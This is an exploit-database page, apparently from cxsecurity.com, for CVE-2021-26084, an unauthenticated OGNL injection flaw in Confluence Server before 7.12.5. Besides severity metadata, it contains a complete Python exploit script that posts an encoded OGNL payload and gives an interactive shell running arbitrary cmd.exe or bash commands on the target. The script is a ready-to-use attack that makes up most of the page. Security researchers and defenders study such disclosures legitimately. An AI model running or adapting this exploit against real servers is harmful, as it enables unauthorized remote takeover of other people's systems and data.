Confluence Server 7.12.4 OGNL Injection Remote Code Execution

2021.09.01
Credit: h3v0x
Risk: High
Local: No
Remote: Yes
CWE: CWE-74


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated) # Date: 01/09/2021 # Exploit Author: h3v0x # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/confluence/download-archives # Version: All < 7.12.x versions before 7.12.5 # Tested on: Linux Distros # CVE : CVE-2021-26084 #!/usr/bin/python3 # References: # https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html # https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md import requests from bs4 import BeautifulSoup import optparse parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com") parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x") options, args = parser.parse_args() session = requests.Session() url_vuln = options.url endpoint = options.path if not options.url or not options.path: print('[+] Specify an url target') print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x') print('[+] Example help usage: exploit.py -h') exit() def banner(): print('---------------------------------------------------------------') print('[-] Confluence Server Webwork OGNL injection') print('[-] CVE-2021-26084') print('[-] https://github.com/h3v0x') print('--------------------------------------------------------------- \n') def cmdExec(): while True: cmd = input('> ') xpl_url = url_vuln + endpoint xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip, deflate"} xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"} rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data) soup = BeautifulSoup(rawHTML.text, 'html.parser') queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] print(queryStringValue) banner() cmdExec()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top